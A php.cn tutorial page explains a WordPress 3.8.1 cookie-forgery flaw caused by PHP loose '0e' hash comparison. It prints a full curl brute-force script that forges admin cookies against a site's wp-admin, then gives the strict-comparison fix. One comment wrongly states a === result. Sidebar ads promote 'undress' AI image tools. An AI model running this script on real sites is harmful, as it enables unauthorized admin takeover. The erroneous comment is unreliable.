PHP weak typing: WordPress cookie forgery-PHP Tutorial-php.cn

Home

Backend Development

PHP Tutorial

PHP weak typing: WordPress cookie forgery

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Aug 10, 2016 am 08:48 AM

cookie curl hash hmac wordpress

1 PHP is weakly typed

　 PHP is a weakly typed language, so variables will be automatically type converted due to different usage scenarios. Use == and in PHP! = When performing equality judgment, type conversion will be performed automatically. Use === and ! == The type will not be automatically converted when making judgments.

<span>1</span> <?<span>php
</span><span>2</span><span>$a</span> = 3<span>;
</span><span>3</span><span>$b</span> = '3vic'<span>;
</span><span>4</span><span>var_dump</span>(<span>$a</span> == <span>$b</span>);<span>//</span><span>true</span><span>5</span><span>var_dump</span>(<span>$a</span> != <span>$b</span>);<span>//</span><span>false</span><span>6</span><span>var_dump</span>(<span>$a</span> === <span>$b</span>);<span>//</span><span>true</span><span>7</span><span>var_dump</span>(<span>$a</span> !== <span>$b</span>);<span>//</span><span>false</span><span>8</span> ?>

Copy after login

　Note: When converting a string into an integer in PHP, if it starts with a number, it will be converted to the previous number ('3vic' -> 3). If it does not start with a number, it will be converted to 0 ('vic' -> 0)

2 WordPress code

WordPress 3.8.1 and WordPress 3.8.2 Some code differences

<span>1</span> <?<span>php
</span><span>2</span><span>//</span><span> WordPress 3.8.1</span><span>3</span><span>if</span> (<span>$hmac</span> != <span>$hash</span><span>) {}
</span><span>4</span><span>//</span><span> WordPress 3.8.2</span><span>5</span><span>if</span> ( hash_hmac('md5', <span>$hmac</span>, <span>$key</span>) !== hash_hmac('md5', <span>$hash</span>, <span>$key</span><span>) )  {}
</span><span>6</span> ?>

Copy after login

Cookie Composition

　The client background only verifies one of the cookies, as shown below

wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|<span>1433403595</span>|cf50f3b50eed94dd0fdc3d3ea2c7bbb; path=/wp-admin; domain=www.test.ichunqiu; HttpOnly

Copy after login

　The cookie name

wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91 format is wordpress_ + m d5(siteurl) Where siteurl is the URL of WordPress. The website address here is http://www.test.ichunqiu, and after md5 encryption, it is c47f4a97d0321c1980bb76fc00d1e78f. Other parts can also be omitted.

Type username expiration time The hash value assigned to the client by the server after successful login

Corresponding variable	$username	$expiration	$hmac
cookies	admin	1433403595	cf50f3b50eed94dd0fdc3d3ea2c7bbb

　Code

wp-includes/pluggable.php Lines 543-549

<span>1</span> <?<span>php
</span><span>2</span><span>$key</span> = wp_hash(<span>$username</span> . <span>$pass_frag</span> . '|' . <span>$expiration</span>, <span>$scheme</span><span>);
</span><span>3</span><span>$hash</span> = hash_hmac('md5', <span>$username</span> . '|' . <span>$expiration</span>, <span>$key</span><span>);
</span><span>4</span><span>if</span> ( <span>$hmac</span> != <span>$hash</span><span> ) {
</span><span>5</span>     do_action('auth_cookie_bad_hash', <span>$cookie_elements</span><span>);
</span><span>6</span><span>return</span><span>false</span><span>;
</span><span>7</span> }

Copy after login

　At the code location Among the variables used, the ones that can be controlled by changing the client cookie include

$username username, $expiration expiration date, and because the username is fixed, only $expiration is controllable , so we can change $hash by changing $expiration .

Comparison defects Analysis of WordPress

There are several possibilities to make

$hmac == $hash true, the strings are completely equal or $hmac is equal to 0 at the same time $hash is a string starting with a character; change the $hmac value in the client’s cookie to 0, and then write in the line above if ( $hmac != $hash ) { var_dump($hmac);die();I found that the result of printing $hmac is string '0' instead of int 0, so is there a way to make the string To recognize it as an integer, the code is as follows:

<span>1</span> <?<span>php
</span><span>2</span><span>var_dump</span>('0' == '0e156464513131');<span>//</span><span>true</span>

Copy after login

　 Among them,

0e156464513131 will be recognized as 0 multiplied by 10 to the power of 156464513131, which is still 0; therefore, when $hash starts with 0e and is followed by all When it is a number, it will be equal to when the value of $hmac is '0', so we can set the client's cookie to something like wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|0 and then continuously update the expiration time (now 1 433403595 position) to collide with the server side. Once the value of $hash starts with 0e and is followed by numbers, it can be verified and passed. Assuming that the collision is successful, modify the browser's cookie and directly access the backend address to successfully log in to the backend.

3 Test script

By changing the expiration time value in the client cookie, constantly trying to log in to the backend, and finding out the timestamp that can enter the backend, thereby realizing cookie forgery login backend.

<span> 1</span> <?<span>php
</span><span> 2</span><span>/*</span><span> 3</span><span> 4</span><span>本脚本用于WordPress 3.8.1 的cookie伪造漏洞检测
</span><span> 5</span><span>传入两个值
</span><span> 6</span><span>  WordPress 的主页 $host
</span><span> 7</span><span>  管理员用户名     $root
</span><span> 8</span><span>*/</span><span> 9</span><span>header</span>("Content-type:text/html;charset=utf-8"<span>);
</span><span>10</span><span>11</span><span>$host</span> = 'http://xxx.xxx.xxx';<span>//</span><span>主页地址 结尾不带'/'</span><span>12</span><span>$root</span> = 'user';<span>//</span><span>管理员用户名</span><span>13</span><span>14</span><span>$url</span> = <span>$host</span>.'/wp-admin/';<span>//</span><span>后台管理地址    </span><span>15</span><span>$sitehash</span>=<span>md5</span>(<span>$host</span><span>); 
</span><span>16</span><span>17</span><span>echo</span> "\nWelcome\n\n"<span>;
</span><span>18</span><span>//</span><span>通过时间戳暴力破解cookie 实现伪造cookie</span><span>19</span><span>for</span>(<span>$i</span>=1500000000;<span>$i</span><1600000000;<span>$i</span>++<span>){
</span><span>20</span><span>$cookie</span> = "wordpress_".<span>$sitehash</span>."=".<span>$root</span>."|".<span>$i</span>."|0;";<span>//</span><span>组合构造cookie</span><span>21</span><span>$header</span> = <span>array</span><span>(
</span><span>22</span>        "Content-Type:application/x-www-form-urlencoded",
<span>23</span>       'User-Agent: Mozilla/4.0 (compatible; MSIE .0; Windows NT 6.1; Trident/4.0; SLCC2;)',
<span>24</span>       "Cookie:".<span>$cookie</span>,
<span>25</span><span>      );
</span><span>26</span><span>27</span><span>$curl</span> = curl_init(); <span>//</span><span> 启动一个CURL会话    </span><span>28</span>         curl_setopt(<span>$curl</span>, CURLOPT_URL, <span>$url</span>); <span>//</span><span> 要访问的地址</span><span>29</span>         curl_setopt(<span>$curl</span>, CURLOPT_FOLLOWLOCATION, 1); <span>//</span><span> 使用自动跳转    </span><span>30</span>         curl_setopt(<span>$curl</span>, CURLOPT_AUTOREFERER, 1); <span>//</span><span> 自动设置Referer    </span><span>31</span>         curl_setopt(<span>$curl</span>, CURLOPT_HTTPGET, <span>true</span>); <span>//</span><span> 发送一个常规的Post请求    </span><span>32</span>         curl_setopt(<span>$curl</span>, CURLOPT_HTTPHEADER, <span>$header</span>); <span>//</span><span> 读取上面所储存的Cookie信息         </span><span>33</span>         curl_setopt(<span>$curl</span>, CURLOPT_RETURNTRANSFER, 1); <span>//</span><span> 获取的信息以文件流的形式返回 </span><span>34</span>         curl_setopt(<span>$curl</span>, CURLOPT_HEADER, <span>false</span><span>);
</span><span>35</span>         curl_setopt(<span>$curl</span>, CURLOPT_HEADER, 0<span>);   
</span><span>36</span>         curl_setopt(<span>$curl</span>, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);<span>//</span><span>让curl自动选择版本</span><span>37</span><span>$tmpInfo</span> = curl_exec(<span>$curl</span>); <span>//</span><span> 执行操作</span><span>38</span><span>if</span> (curl_errno(<span>$curl</span><span>)) {    
</span><span>39</span><span>echo</span> 'Errno'.curl_error(<span>$curl</span><span>);    
</span><span>40</span><span>        }    
</span><span>41</span>         curl_close(<span>$curl</span>); <span>//</span><span> 关闭CURL会话
</span><span>42</span><span>43</span><span>        //匹配结果</span><span>44</span><span>if</span>(<span>strstr</span>(<span>$tmpInfo</span>,'我们准备了几个链接供您开始'<span>)){
</span><span>45</span><span>echo</span>  "\n".'success : '.<span>$cookie</span>."\n\n"<span>;
</span><span>46</span><span>break</span><span>;
</span><span>47</span>         }<span>else</span><span>{
</span><span>48</span><span>echo</span>  'fail : '.<span>$cookie</span>."\n"<span>;
</span><span>49</span><span>        }
</span><span>50</span><span>51</span><span>    }
</span><span>52</span> ?>

Copy after login

Explanation: Theoretically, the 32-bit MD5 value starting with 0e is about one in 300 million, and the chance of hitting an exploitable $expiration is extremely low .

5 Fix

　Hash comparison function used in PHP, change == , ! = changed to === and respectively! == Or use MD5 to encrypt the two compared variables again.

Study notes: http://ichunqiu.com/course/167

The above introduces the PHP weak type: WordPress cookie forgery, including the content. I hope it will be helpful to friends who are interested in PHP tutorials.

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

What's New in Windows 11 KB5054979 & How to Fix Update Issues

3 weeks ago By DDD

How to fix KB5055523 fails to install in Windows 11?

2 weeks ago By DDD

InZoi: How To Apply To School And University

3 weeks ago By DDD

How to fix KB5055518 fails to install in Windows 10?

2 weeks ago By DDD

Roblox: Dead Rails – How To Summon And Defeat Nikola Tesla

4 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Hot Tools

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Hot Topics

Where is the login entrance for gmail email?

7807

Java Tutorial

1646

CakePHP Tutorial

1402

Laravel Tutorial

1300

PHP Tutorial

1236

Related knowledge

How to adjust the wordpress article list Apr 20, 2025 am 10:48 AM

There are four ways to adjust the WordPress article list: use theme options, use plugins (such as Post Types Order, WP Post List, Boxy Stuff), use code (add settings in the functions.php file), or modify the WordPress database directly.

What are the plugins for wordpress blocking ip Apr 20, 2025 am 08:27 AM

WordPress IP blocking plugin selection is crucial. The following types can be considered: based on .htaccess: efficient, but complex operation; database operation: flexible, but low efficiency; firewall: high security performance, but complex configuration; self-written: highest control, but requires more technical level.

How to cancel the editing date of wordpress Apr 20, 2025 am 10:54 AM

WordPress editing dates can be canceled in three ways: 1. Install the Enable Post Date Disable plug-in; 2. Add code in the functions.php file; 3. Manually edit the post_modified column in the wp_posts table.

How to change the head image of the wordpress theme Apr 20, 2025 am 10:00 AM

A step-by-step guide to replacing a header image of WordPress: Log in to the WordPress dashboard and navigate to Appearance >Theme. Select the topic you want to edit and click Customize. Open the Theme Options panel and look for the Site Header or Header Image options. Click the Select Image button and upload a new head image. Crop the image and click Save and Crop. Click the Save and Publish button to update the changes.

How to write a header of a wordpress Apr 20, 2025 pm 12:09 PM

The steps to create a custom header in WordPress are as follows: Edit the theme file "header.php". Add your website name and description. Create a navigation menu. Add a search bar. Save changes and view your custom header.

How to build a website for wordpress host Apr 20, 2025 am 11:12 AM

To build a website using WordPress hosting, you need to: select a reliable hosting provider. Buy a domain name. Set up a WordPress hosting account. Select a topic. Add pages and articles. Install the plug-in. Customize your website. Publish your website.

What to do if there is an error in wordpress Apr 20, 2025 am 11:57 AM

WordPress Error Resolution Guide: 500 Internal Server Error: Disable the plug-in or check the server error log. 404 Page not found: Check permalink and make sure the page link is correct. White Screen of Death: Increase the server PHP memory limit. Database connection error: Check the database server status and WordPress configuration. Other tips: enable debug mode, check error logs, and seek support. Prevent errors: regularly update WordPress, install only necessary plugins, regularly back up your website, and optimize website performance.

How to display wordpress comments Apr 20, 2025 pm 12:06 PM

Enable comments in WordPress website: 1. Log in to the admin panel, go to "Settings" - "Discussions", and check "Allow comments"; 2. Select a location to display comments; 3. Customize comments; 4. Manage comments, approve, reject or delete; 5. Use <?php comments_template(); ?> tags to display comments; 6. Enable nested comments; 7. Adjust comment shape; 8. Use plugins and verification codes to prevent spam comments; 9. Encourage users to use Gravatar avatar; 10. Create comments to refer to

See all articles